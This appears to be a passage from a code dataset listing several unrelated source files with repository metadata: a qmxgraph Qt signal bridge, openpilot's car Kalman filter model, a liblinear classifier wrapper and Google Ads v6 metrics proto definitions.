:ivar pyqtSignal on_terminal_with_port_changed: JavaScript client code emits
this signal when a cell terminal change with port information. Arguments:
- cell_id: str
- terminal_type: str
- new_terminal_id: str
- new_terminal_port_id: str
- old_terminal_id: str
- old_terminal_port_id: str
:ivar pyqtSignal on_view_update: JavaScript client code emits this
signal when the view is updated. Arguments:
- graph_view: str
- scale_and_translation: QVariantList
:ivar pyqtSignal on_cells_bounds_changed: JavaScript client code emits
this signal when some cells' bounds changes.The arguments `dict`
maps the affected `cell_id`s
to :class:`qmxgraph.cell_bounds.CellBounds` dict representations:
- changed_bounds: dict
Using this object connecting to events from JavaScript basically becomes a
matter of using Qt signals.
.. code-block::
def on_cells_added_handler(cell_ids):
print(f'added {cell_ids}')
def on_terminal_changed_handler(
cell_id, terminal_type, new_terminal_id, old_terminal_id):
print(
f'{terminal_type} of {cell_id} changed from'
f' {old_terminal_id} to {new_terminal_id}'
)
def on_cells_removed_handler(cell_ids):
print(f'removed {cell_ids}')
events_bridge = EventsBridge()
widget = ...
widget.set_events_bridge(events_bridge)
events_bridge.on_cells_added.connect(on_cells_added_handler)
events_bridge.on_cells_removed.connect(on_cells_removed_handler)
events_bridge.on_terminal_changed.connect(on_terminal_changed_handler)
"""
on_cells_removed = pyqtSignal('QVariantList', name='on_cells_removed')
on_cells_added = pyqtSignal('QVariantList', name='on_cells_added')
on_label_changed = pyqtSignal(str, str, str, name='on_label_changed')
on_selection_changed = pyqtSignal(
'QVariantList', name='on_selection_changed')
on_terminal_changed = pyqtSignal(
str, str, str, str, name='on_terminal_changed')
on_terminal_with_port_changed = pyqtSignal(
str, str, str, str, str, str, name='on_terminal_with_port_changed')
on_view_update = pyqtSignal(str, 'QVariantList', name='on_view_update')
on_cells_bounds_changed = pyqtSignal('QVariant', name='on_cells_bounds_changed')
class _DoubleClickBridge(QObject):
"""
A private bridge used for double click events in JavaScript graph.
It is private so `QmxGraph` can make sure only a single double click
handler is registered, to make sure it doesn't violate what is stated in
`set_double_click_handler` docs of `api` module.
"""
# Arguments:
# cell_id: str
on_double_click = pyqtSignal(str, name='on_double_click')
class _PopupMenuBridge(QObject):
"""
A private bridge used for popup menu events in JavaScript graph.
It is private so `QmxGraph` can make sure only a single popup menu handler
is registered, to make sure it doesn't violate what is stated in
`set_popup_menu_handler` docs of `api` module.
"""
# Arguments:
# cell_id: str
# x: int
# y: int
on_popup_menu = pyqtSignal(str, int, int, name='on_popup_menu')
|
mit
| -7,056,639,670,278,203,000
| 34.253012
| 96
| 0.600436
| false
| 4.238276
| false
| false
| false
|
commaai/openpilot
|
selfdrive/locationd/models/car_kf.py
|
1
|
4757
|
#!/usr/bin/env python3
import math
import sys
from typing import Any, Dict
import numpy as np
from selfdrive.locationd.models.constants import ObservationKind
from selfdrive.swaglog import cloudlog
from rednose.helpers.kalmanfilter import KalmanFilter
if __name__ == '__main__': # Generating sympy
import sympy as sp
from rednose.helpers.ekf_sym import gen_code
else:
from rednose.helpers.ekf_sym_pyx import EKF_sym # pylint: disable=no-name-in-module, import-error
i = 0
def _slice(n):
global i
s = slice(i, i + n)
i += n
return s
class States():
# Vehicle model params
STIFFNESS = _slice(1) # [-]
STEER_RATIO = _slice(1) # [-]
ANGLE_OFFSET = _slice(1) # [rad]
ANGLE_OFFSET_FAST = _slice(1) # [rad]
VELOCITY = _slice(2) # (x, y) [m/s]
YAW_RATE = _slice(1) # [rad/s]
STEER_ANGLE = _slice(1) # [rad]
class CarKalman(KalmanFilter):
name = 'car'
initial_x = np.array([
1.0,
15.0,
0.0,
0.0,
10.0, 0.0,
0.0,
0.0,
])
# process noise
Q = np.diag([
(.05 / 100)**2,
.01**2,
math.radians(0.02)**2,
math.radians(0.25)**2,
.1**2, .01**2,
math.radians(0.1)**2,
math.radians(0.1)**2,
])
P_initial = Q.copy()
obs_noise: Dict[int, Any] = {
ObservationKind.STEER_ANGLE: np.atleast_2d(math.radians(0.01)**2),
ObservationKind.ANGLE_OFFSET_FAST: np.atleast_2d(math.radians(10.0)**2),
ObservationKind.STEER_RATIO: np.atleast_2d(5.0**2),
ObservationKind.STIFFNESS: np.atleast_2d(5.0**2),
ObservationKind.ROAD_FRAME_X_SPEED: np.atleast_2d(0.1**2),
}
global_vars = [
'mass',
'rotational_inertia',
'center_to_front',
'center_to_rear',
'stiffness_front',
'stiffness_rear',
]
@staticmethod
def generate_code(generated_dir):
dim_state = CarKalman.initial_x.shape[0]
name = CarKalman.name
# vehicle models comes from The Science of Vehicle Dynamics: Handling, Braking, and Ride of Road and Race Cars
# Model used is in 6.15 with formula from 6.198
# globals
global_vars = [sp.Symbol(name) for name in CarKalman.global_vars]
m, j, aF, aR, cF_orig, cR_orig = global_vars
# make functions and jacobians with sympy
# state variables
state_sym = sp.MatrixSymbol('state', dim_state, 1)
state = sp.Matrix(state_sym)
# Vehicle model constants
x = state[States.STIFFNESS, :][0, 0]
cF, cR = x * cF_orig, x * cR_orig
angle_offset = state[States.ANGLE_OFFSET, :][0, 0]
angle_offset_fast = state[States.ANGLE_OFFSET_FAST, :][0, 0]
sa = state[States.STEER_ANGLE, :][0, 0]
sR = state[States.STEER_RATIO, :][0, 0]
u, v = state[States.VELOCITY, :]
r = state[States.YAW_RATE, :][0, 0]
A = sp.Matrix(np.zeros((2, 2)))
A[0, 0] = -(cF + cR) / (m * u)
A[0, 1] = -(cF * aF - cR * aR) / (m * u) - u
A[1, 0] = -(cF * aF - cR * aR) / (j * u)
A[1, 1] = -(cF * aF**2 + cR * aR**2) / (j * u)
B = sp.Matrix(np.zeros((2, 1)))
B[0, 0] = cF / m / sR
B[1, 0] = (cF * aF) / j / sR
x = sp.Matrix([v, r]) # lateral velocity, yaw rate
x_dot = A * x + B * (sa - angle_offset - angle_offset_fast)
dt = sp.Symbol('dt')
state_dot = sp.Matrix(np.zeros((dim_state, 1)))
state_dot[States.VELOCITY.start + 1, 0] = x_dot[0]
state_dot[States.YAW_RATE.start, 0] = x_dot[1]
# Basic descretization, 1st order integrator
# Can be pretty bad if dt is big
f_sym = state + dt * state_dot
#
# Observation functions
#
obs_eqs = [
[sp.Matrix([r]), ObservationKind.ROAD_FRAME_YAW_RATE, None],
[sp.Matrix([u, v]), ObservationKind.ROAD_FRAME_XY_SPEED, None],
[sp.Matrix([u]), ObservationKind.ROAD_FRAME_X_SPEED, None],
[sp.Matrix([sa]), ObservationKind.STEER_ANGLE, None],
[sp.Matrix([angle_offset_fast]), ObservationKind.ANGLE_OFFSET_FAST, None],
[sp.Matrix([sR]), ObservationKind.STEER_RATIO, None],
[sp.Matrix([x]), ObservationKind.STIFFNESS, None],
]
gen_code(generated_dir, name, f_sym, dt, state_sym, obs_eqs, dim_state, dim_state, global_vars=global_vars)
def __init__(self, generated_dir, steer_ratio=15, stiffness_factor=1, angle_offset=0): # pylint: disable=super-init-not-called
dim_state = self.initial_x.shape[0]
dim_state_err = self.P_initial.shape[0]
x_init = self.initial_x
x_init[States.STEER_RATIO] = steer_ratio
x_init[States.STIFFNESS] = stiffness_factor
x_init[States.ANGLE_OFFSET] = angle_offset
# init filter
self.filter = EKF_sym(generated_dir, self.name, self.Q, self.initial_x, self.P_initial, dim_state, dim_state_err, global_vars=self.global_vars, logger=cloudlog)
if __name__ == "__main__":
generated_dir = sys.argv[2]
CarKalman.generate_code(generated_dir)
|
mit
| 7,562,025,558,407,216,000
| 27.656627
| 164
| 0.615304
| false
| 2.669473
| false
| false
| false
|
excelly/xpy-ml
|
ex/ml/liblinear.py
|
1
|
3853
|
from common import *
import ex.ml.libsvm.linearutil as lu
def a2l(X, y = None):
'''convert arrays to list
'''
if y is not None:
y = y.tolist()
if issparse(X):
X = [dict(zip(find(row)[1], row.data)) for row in X]
else:
X = X.tolist()
if y is not None:
return (X, y)
else:
return X
class LibLinear:
'''liblinear
'''
def __init(self):
self.n, self.dim, self.options, self.model, self.ulabels, self.preproc_param = [None]*6
def Train(self, X, y, options = None):
''' train libsvm model
'''
# process labels
y = int32(y)
self.ulabels = unique(y)
K = len(self.ulabels)
check(K > 1, 'needs at least 2 classes')
y = EncodeArray(y, self.ulabels)
# process features
self.n, self.dim = X.shape
X, self.preproc_param = Normalize(X, '+-1', 'col')
# train
X, y = a2l(X, y)
if options is None: # default parameter
options = ''
self.model = lu.train(y, X, options + ' -B 1 -q')
def Predict(self, X):
''' predict for test data
'''
# apply preprocessing
X = Normalize(X, self.preproc_param, 'col')[0]
X = a2l(X)
t, acc, P = lu.predict(zeros(len(X), dtype = int32), X, self.model, '')
t = arr(t, dtype = 'int32')
P = arr(P)
# extract results
t = self.ulabels[t]
p=P.max(1)
return (t, p, P)
def CV(self, nfolds, X, y, options = None, verbose = True, poolsize = 1):
''' get cross-validation performance
'''
cvo = CVObject(y.size, nfolds)
if verbose:
log.info('Cross-validating MultiLogistic. Data = {0}'.format(X.shape))
log.info(cvo)
trI, teI, perf = cvo.CV(ipred, X, y, options, poolsize)
t, p = unzip(perf)
idx = arr(Flatten(teI))
t = arr(Flatten(t), int32)
p = arr(Flatten(p))
t[idx]=t.copy()
p[idx]=p.copy()
return (t, p)
def Clone(self):
return deepcopy(self)
def Save(self, filename):
SavePickle(filename, self)
def Load(self, filename):
o=LoadPickles(filename)
Copy(o, self)
def Plot(self, xlim, ylim, color = 'label', gridsize = 50):
'''plot the current classifier
'''
check(self.dim == 2, 'can only plot in 2-D space')
X, Y = MeshGrid(linspace(xlim[0], xlim[1], gridsize),
linspace(ylim[0], ylim[1], gridsize))
F = hstack((col(X), col(Y)))
y, p = self.Predict(F)[:2]
if color == 'label':
scatter(X.ravel(), Y.ravel(), c = y, edgecolors = 'none')
elif color == 'prob':
scatter(X.ravel(), Y.ravel(), c = p, vmin = 0, vmax = 1, edgecolors = 'none')
draw()
def ipred(trI, teI, X, y, options):
'''used for cross validation
'''
model = LibLinear()
model.Train(X[trI], y[trI], options)
t, p, P = model.Predict(X[teI])
return (t.tolist(), p.tolist())
if __name__ == '__main__':
InitLog()
n = 100
pts = vstack((repmat(linspace(-1, 1, n/2), (1, 2)),
hstack((sin(linspace(0, 10, n/2)) + 1, sin(linspace(0, 10, n/2)) - 1)))).T
y = cat((ones(n/2)*3, ones(n/2)*7))
model = LibLinear()
t, p = model.CV(10, pts, y)
acc = (t == y).mean()
print '** Acc: %f' % acc
test(acc > 0.95, "LibSVM Train & Test & CV")
model.Train(pts, y)
t, p, P = model.Predict(pts)
acc = (y == t).mean()
print '** Acc: %f' % acc
subplot(gcf(), 131);
plot(pts[:,0], pts[:,1], '+')
subplot(gcf(), 132)
model.Plot(GetRange(pts[:,0]), GetRange(pts[:,1]), 'label', 100)
subplot(gcf(), 133)
model.Plot(GetRange(pts[:,0]), GetRange(pts[:,1]), 'prob', 100)
show()
|
apache-2.0
| -1,892,333,781,465,634,600
| 24.516556
| 95
| 0.509473
| false
| 3.062798
| false
| false
| false
|
googleads/google-ads-python
|
google/ads/googleads/v6/common/types/metrics.py
|
1
|
42787
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v6.enums.types import interaction_event_type
from google.ads.googleads.v6.enums.types import quality_score_bucket
__protobuf__ = proto.module(
package="google.ads.googleads.v6.common",
marshal="google.ads.googleads.v6",
manifest={"Metrics",},
)
class Metrics(proto.Message):
r"""Metrics data.
Attributes:
absolute_top_impression_percentage (float):
The percent of your ad impressions that are
shown as the very first ad above the organic
search results.
active_view_cpm (float):
Average cost of viewable impressions
(``active_view_impressions``).
active_view_ctr (float):
Active view measurable clicks divided by
active view viewable impressions. This metric is
reported only for display network.
active_view_impressions (int):
A measurement of how often your ad has become
viewable on a Display Network site.
active_view_measurability (float):
The ratio of impressions that could be
measured by Active View over the number of
served impressions.
active_view_measurable_cost_micros (int):
The cost of the impressions you received that
were measurable by Active View.
active_view_measurable_impressions (int):
The number of times your ads are appearing on
placements in positions where they can be seen.
active_view_viewability (float):
The percentage of time when your ad appeared
on an Active View enabled site (measurable
impressions) and was viewable (viewable
impressions).
all_conversions_from_interactions_rate (float):
All conversions from interactions (as oppose
to view through conversions) divided by the
number of ad interactions.
all_conversions_value (float):
The value of all conversions.
all_conversions_value_by_conversion_date (float):
The value of all conversions. When this column is selected
with date, the values in date column means the conversion
date. Details for the by_conversion_date columns are
available at
https://support.google.com/google-ads/answer/9549009.
all_conversions (float):
The total number of conversions. This includes all
conversions regardless of the value of
include_in_conversions_metric.
all_conversions_by_conversion_date (float):
The total number of conversions. This includes all
conversions regardless of the value of
include_in_conversions_metric. When this column is selected
with date, the values in date column means the conversion
date. Details for the by_conversion_date columns are
available at
https://support.google.com/google-ads/answer/9549009.
all_conversions_value_per_cost (float):
The value of all conversions divided by the
total cost of ad interactions (such as clicks
for text ads or views for video ads).
all_conversions_from_click_to_call (float):
The number of times people clicked the "Call"
button to call a store during or after clicking
an ad. This number doesn't include whether or
not calls were connected, or the duration of any
calls. This metric applies to feed items only.
all_conversions_from_directions (float):
The number of times people clicked a "Get
directions" button to navigate to a store after
clicking an ad. This metric applies to feed
items only.
all_conversions_from_interactions_value_per_interaction (float):
The value of all conversions from
interactions divided by the total number of
interactions.
all_conversions_from_menu (float):
The number of times people clicked a link to
view a store's menu after clicking an ad.
This metric applies to feed items only.
all_conversions_from_order (float):
The number of times people placed an order at
a store after clicking an ad. This metric
applies to feed items only.
all_conversions_from_other_engagement (float):
The number of other conversions (for example,
posting a review or saving a location for a
store) that occurred after people clicked an ad.
This metric applies to feed items only.
all_conversions_from_store_visit (float):
Estimated number of times people visited a
store after clicking an ad. This metric applies
to feed items only.
all_conversions_from_store_website (float):
The number of times that people were taken to
a store's URL after clicking an ad.
This metric applies to feed items only.
average_cost (float):
The average amount you pay per interaction.
This amount is the total cost of your ads
divided by the total number of interactions.
average_cpc (float):
The total cost of all clicks divided by the
total number of clicks received.
average_cpe (float):
The average amount that you've been charged
for an ad engagement. This amount is the total
cost of all ad engagements divided by the total
number of ad engagements.
average_cpm (float):
Average cost-per-thousand impressions (CPM).
average_cpv (float):
The average amount you pay each time someone
views your ad. The average CPV is defined by the
total cost of all ad views divided by the number
of views.
average_page_views (float):
Average number of pages viewed per session.
average_time_on_site (float):
Total duration of all sessions (in seconds) /
number of sessions. Imported from Google
Analytics.
benchmark_average_max_cpc (float):
An indication of how other advertisers are
bidding on similar products.
benchmark_ctr (float):
An indication on how other advertisers'
Shopping ads for similar products are performing
based on how often people who see their ad click
on it.
bounce_rate (float):
Percentage of clicks where the user only
visited a single page on your site. Imported
from Google Analytics.
clicks (int):
The number of clicks.
combined_clicks (int):
The number of times your ad or your site's
listing in the unpaid results was clicked. See
the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
combined_clicks_per_query (float):
The number of times your ad or your site's listing in the
unpaid results was clicked (combined_clicks) divided by
combined_queries. See the help page at
https://support.google.com/google-ads/answer/3097241 for
details.
combined_queries (int):
The number of searches that returned pages
from your site in the unpaid results or showed
one of your text ads. See the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
content_budget_lost_impression_share (float):
The estimated percent of times that your ad
was eligible to show on the Display Network but
didn't because your budget was too low. Note:
Content budget lost impression share is reported
in the range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
content_impression_share (float):
The impressions you've received on the
Display Network divided by the estimated number
of impressions you were eligible to receive.
Note: Content impression share is reported in
the range of 0.1 to 1. Any value below 0.1 is
reported as 0.0999.
conversion_last_received_request_date_time (str):
The last date/time a conversion tag for this
conversion action successfully fired and was
seen by Google Ads. This firing event may not
have been the result of an attributable
conversion (e.g. because the tag was fired from
a browser that did not previously click an ad
from an appropriate advertiser). The date/time
is in the customer's time zone.
conversion_last_conversion_date (str):
The date of the most recent conversion for
this conversion action. The date is in the
customer's time zone.
content_rank_lost_impression_share (float):
The estimated percentage of impressions on
the Display Network that your ads didn't receive
due to poor Ad Rank. Note: Content rank lost
impression share is reported in the range of 0
to 0.9. Any value above 0.9 is reported as
0.9001.
conversions_from_interactions_rate (float):
Conversions from interactions divided by the number of ad
interactions (such as clicks for text ads or views for video
ads). This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
conversions_value (float):
The value of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
conversions_value_by_conversion_date (float):
The value of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions. When this
column is selected with date, the values in date column
means the conversion date. Details for the
by_conversion_date columns are available at
https://support.google.com/google-ads/answer/9549009.
conversions_value_per_cost (float):
The value of conversions divided by the cost of ad
interactions. This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
conversions_from_interactions_value_per_interaction (float):
The value of conversions from interactions divided by the
number of ad interactions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
conversions (float):
The number of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
conversions_by_conversion_date (float):
The number of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions. When this
column is selected with date, the values in date column
means the conversion date. Details for the
by_conversion_date columns are available at
https://support.google.com/google-ads/answer/9549009.
cost_micros (int):
The sum of your cost-per-click (CPC) and
cost-per-thousand impressions (CPM) costs during
this period.
cost_per_all_conversions (float):
The cost of ad interactions divided by all
conversions.
cost_per_conversion (float):
The cost of ad interactions divided by conversions. This
only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
cost_per_current_model_attributed_conversion (float):
The cost of ad interactions divided by current model
attributed conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
cross_device_conversions (float):
Conversions from when a customer clicks on a Google Ads ad
on one device, then converts on a different device or
browser. Cross-device conversions are already included in
all_conversions.
ctr (float):
The number of clicks your ad receives
(Clicks) divided by the number of times your ad
is shown (Impressions).
current_model_attributed_conversions (float):
Shows how your historic conversions data would look under
the attribution model you've currently selected. This only
includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
current_model_attributed_conversions_from_interactions_rate (float):
Current model attributed conversions from interactions
divided by the number of ad interactions (such as clicks for
text ads or views for video ads). This only includes
conversion actions which include_in_conversions_metric
attribute is set to true. If you use conversion-based
bidding, your bid strategies will optimize for these
conversions.
current_model_attributed_conversions_from_interactions_value_per_interaction (float):
The value of current model attributed conversions from
interactions divided by the number of ad interactions. This
only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
current_model_attributed_conversions_value (float):
The value of current model attributed conversions. This only
includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
current_model_attributed_conversions_value_per_cost (float):
The value of current model attributed conversions divided by
the cost of ad interactions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
engagement_rate (float):
How often people engage with your ad after
it's shown to them. This is the number of ad
expansions divided by the number of times your
ad is shown.
engagements (int):
The number of engagements.
An engagement occurs when a viewer expands your
Lightbox ad. Also, in the future, other ad types
may support engagement metrics.
hotel_average_lead_value_micros (float):
Average lead value based on clicks.
hotel_price_difference_percentage (float):
The average price difference between the
price offered by reporting hotel advertiser and
the cheapest price offered by the competing
advertiser.
hotel_eligible_impressions (int):
The number of impressions that hotel partners
could have had given their feed performance.
historical_creative_quality_score (google.ads.googleads.v6.enums.types.QualityScoreBucketEnum.QualityScoreBucket):
The creative historical quality score.
historical_landing_page_quality_score (google.ads.googleads.v6.enums.types.QualityScoreBucketEnum.QualityScoreBucket):
The quality of historical landing page
experience.
historical_quality_score (int):
The historical quality score.
historical_search_predicted_ctr (google.ads.googleads.v6.enums.types.QualityScoreBucketEnum.QualityScoreBucket):
The historical search predicted click through
rate (CTR).
gmail_forwards (int):
The number of times the ad was forwarded to
someone else as a message.
gmail_saves (int):
The number of times someone has saved your
Gmail ad to their inbox as a message.
gmail_secondary_clicks (int):
The number of clicks to the landing page on
the expanded state of Gmail ads.
impressions_from_store_reach (int):
The number of times a store's location-based
ad was shown. This metric applies to feed items
only.
impressions (int):
Count of how often your ad has appeared on a
search results page or website on the Google
Network.
interaction_rate (float):
How often people interact with your ad after
it is shown to them. This is the number of
interactions divided by the number of times your
ad is shown.
interactions (int):
The number of interactions.
An interaction is the main user action
associated with an ad format-clicks for text and
shopping ads, views for video ads, and so on.
interaction_event_types (Sequence[google.ads.googleads.v6.enums.types.InteractionEventTypeEnum.InteractionEventType]):
The types of payable and free interactions.
invalid_click_rate (float):
The percentage of clicks filtered out of your
total number of clicks (filtered + non-filtered
clicks) during the reporting period.
invalid_clicks (int):
Number of clicks Google considers
illegitimate and doesn't charge you for.
message_chats (int):
Number of message chats initiated for Click
To Message impressions that were message
tracking eligible.
message_impressions (int):
Number of Click To Message impressions that
were message tracking eligible.
message_chat_rate (float):
Number of message chats initiated (message_chats) divided by
the number of message impressions (message_impressions).
Rate at which a user initiates a message chat from an ad
impression with a messaging option and message tracking
enabled. Note that this rate can be more than 1.0 for a
given message impression.
mobile_friendly_clicks_percentage (float):
The percentage of mobile clicks that go to a
mobile-friendly page.
organic_clicks (int):
The number of times someone clicked your
site's listing in the unpaid results for a
particular query. See the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
organic_clicks_per_query (float):
The number of times someone clicked your site's listing in
the unpaid results (organic_clicks) divided by the total
number of searches that returned pages from your site
(organic_queries). See the help page at
https://support.google.com/google-ads/answer/3097241 for
details.
organic_impressions (int):
The number of listings for your site in the
unpaid search results. See the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
organic_impressions_per_query (float):
The number of times a page from your site was listed in the
unpaid search results (organic_impressions) divided by the
number of searches returning your site's listing in the
unpaid results (organic_queries). See the help page at
https://support.google.com/google-ads/answer/3097241 for
details.
organic_queries (int):
The total number of searches that returned
your site's listing in the unpaid results. See
the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
percent_new_visitors (float):
Percentage of first-time sessions (from
people who had never visited your site before).
Imported from Google Analytics.
phone_calls (int):
Number of offline phone calls.
phone_impressions (int):
Number of offline phone impressions.
phone_through_rate (float):
Number of phone calls received (phone_calls) divided by the
number of times your phone number is shown
(phone_impressions).
relative_ctr (float):
Your clickthrough rate (Ctr) divided by the
average clickthrough rate of all advertisers on
the websites that show your ads. Measures how
your ads perform on Display Network sites
compared to other ads on the same sites.
search_absolute_top_impression_share (float):
The percentage of the customer's Shopping or
Search ad impressions that are shown in the most
prominent Shopping position. See
https://support.google.com/google-
ads/answer/7501826 for details. Any value below
0.1 is reported as 0.0999.
search_budget_lost_absolute_top_impression_share (float):
The number estimating how often your ad
wasn't the very first ad above the organic
search results due to a low budget. Note: Search
budget lost absolute top impression share is
reported in the range of 0 to 0.9. Any value
above 0.9 is reported as 0.9001.
search_budget_lost_impression_share (float):
The estimated percent of times that your ad
was eligible to show on the Search Network but
didn't because your budget was too low. Note:
Search budget lost impression share is reported
in the range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
search_budget_lost_top_impression_share (float):
The number estimating how often your ad
didn't show anywhere above the organic search
results due to a low budget. Note: Search budget
lost top impression share is reported in the
range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
search_click_share (float):
The number of clicks you've received on the
Search Network divided by the estimated number
of clicks you were eligible to receive. Note:
Search click share is reported in the range of
0.1 to 1. Any value below 0.1 is reported as
0.0999.
search_exact_match_impression_share (float):
The impressions you've received divided by
the estimated number of impressions you were
eligible to receive on the Search Network for
search terms that matched your keywords exactly
(or were close variants of your keyword),
regardless of your keyword match types. Note:
Search exact match impression share is reported
in the range of 0.1 to 1. Any value below 0.1 is
reported as 0.0999.
search_impression_share (float):
The impressions you've received on the Search
Network divided by the estimated number of
impressions you were eligible to receive. Note:
Search impression share is reported in the range
of 0.1 to 1. Any value below 0.1 is reported as
0.0999.
search_rank_lost_absolute_top_impression_share (float):
The number estimating how often your ad
wasn't the very first ad above the organic
search results due to poor Ad Rank. Note: Search
rank lost absolute top impression share is
reported in the range of 0 to 0.9. Any value
above 0.9 is reported as 0.9001.
search_rank_lost_impression_share (float):
The estimated percentage of impressions on
the Search Network that your ads didn't receive
due to poor Ad Rank. Note: Search rank lost
impression share is reported in the range of 0
to 0.9. Any value above 0.9 is reported as
0.9001.
search_rank_lost_top_impression_share (float):
The number estimating how often your ad
didn't show anywhere above the organic search
results due to poor Ad Rank. Note: Search rank
lost top impression share is reported in the
range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
search_top_impression_share (float):
The impressions you've received in the top
location (anywhere above the organic search
results) compared to the estimated number of
impressions you were eligible to receive in the
top location. Note: Search top impression share
is reported in the range of 0.1 to 1. Any value
below 0.1 is reported as 0.0999.
speed_score (int):
A measure of how quickly your page loads
after clicks on your mobile ads. The score is a
range from 1 to 10, 10 being the fastest.
top_impression_percentage (float):
The percent of your ad impressions that are
shown anywhere above the organic search results.
valid_accelerated_mobile_pages_clicks_percentage (float):
The percentage of ad clicks to Accelerated
Mobile Pages (AMP) landing pages that reach a
valid AMP page.
value_per_all_conversions (float):
The value of all conversions divided by the
number of all conversions.
value_per_all_conversions_by_conversion_date (float):
The value of all conversions divided by the number of all
conversions. When this column is selected with date, the
values in date column means the conversion date. Details for
the by_conversion_date columns are available at
https://support.google.com/google-ads/answer/9549009.
value_per_conversion (float):
The value of conversions divided by the number of
conversions. This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
value_per_conversions_by_conversion_date (float):
The value of conversions divided by the number of
conversions. This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions. When this column is selected
with date, the values in date column means the conversion
date. Details for the by_conversion_date columns are
available at
https://support.google.com/google-ads/answer/9549009.
value_per_current_model_attributed_conversion (float):
The value of current model attributed conversions divided by
the number of the conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
video_quartile_p100_rate (float):
Percentage of impressions where the viewer
watched all of your video.
video_quartile_p25_rate (float):
Percentage of impressions where the viewer
watched 25% of your video.
video_quartile_p50_rate (float):
Percentage of impressions where the viewer
watched 50% of your video.
video_quartile_p75_rate (float):
Percentage of impressions where the viewer
watched 75% of your video.
video_view_rate (float):
The number of views your TrueView video ad
receives divided by its number of impressions,
including thumbnail impressions for TrueView in-
display ads.
video_views (int):
The number of times your video ads were
viewed.
view_through_conversions (int):
The total number of view-through conversions.
These happen when a customer sees an image or
rich media ad, then later completes a conversion
on your site without interacting with (e.g.,
clicking on) another ad.
"""
absolute_top_impression_percentage = proto.Field(
proto.DOUBLE, number=183, optional=True
)
active_view_cpm = proto.Field(proto.DOUBLE, number=184, optional=True)
active_view_ctr = proto.Field(proto.DOUBLE, number=185, optional=True)
active_view_impressions = proto.Field(
proto.INT64, number=186, optional=True
)
active_view_measurability = proto.Field(
proto.DOUBLE, number=187, optional=True
)
active_view_measurable_cost_micros = proto.Field(
proto.INT64, number=188, optional=True
)
active_view_measurable_impressions = proto.Field(
proto.INT64, number=189, optional=True
)
active_view_viewability = proto.Field(
proto.DOUBLE, number=190, optional=True
)
all_conversions_from_interactions_rate = proto.Field(
proto.DOUBLE, number=191, optional=True
)
all_conversions_value = proto.Field(proto.DOUBLE, number=192, optional=True)
all_conversions_value_by_conversion_date = proto.Field(
proto.DOUBLE, number=240
)
all_conversions = proto.Field(proto.DOUBLE, number=193, optional=True)
all_conversions_by_conversion_date = proto.Field(proto.DOUBLE, number=241)
all_conversions_value_per_cost = proto.Field(
proto.DOUBLE, number=194, optional=True
)
all_conversions_from_click_to_call = proto.Field(
proto.DOUBLE, number=195, optional=True
)
all_conversions_from_directions = proto.Field(
proto.DOUBLE, number=196, optional=True
)
all_conversions_from_interactions_value_per_interaction = proto.Field(
proto.DOUBLE, number=197, optional=True
)
all_conversions_from_menu = proto.Field(
proto.DOUBLE, number=198, optional=True
)
all_conversions_from_order = proto.Field(
proto.DOUBLE, number=199, optional=True
)
all_conversions_from_other_engagement = proto.Field(
proto.DOUBLE, number=200, optional=True
)
all_conversions_from_store_visit = proto.Field(
proto.DOUBLE, number=201, optional=True
)
all_conversions_from_store_website = proto.Field(
proto.DOUBLE, number=202, optional=True
)
average_cost = proto.Field(proto.DOUBLE, number=203, optional=True)
average_cpc = proto.Field(proto.DOUBLE, number=204, optional=True)
average_cpe = proto.Field(proto.DOUBLE, number=205, optional=True)
average_cpm = proto.Field(proto.DOUBLE, number=206, optional=True)
average_cpv = proto.Field(proto.DOUBLE, number=207, optional=True)
average_page_views = proto.Field(proto.DOUBLE, number=208, optional=True)
average_time_on_site = proto.Field(proto.DOUBLE, number=209, optional=True)
benchmark_average_max_cpc = proto.Field(
proto.DOUBLE, number=210, optional=True
)
benchmark_ctr = proto.Field(proto.DOUBLE, number=211, optional=True)
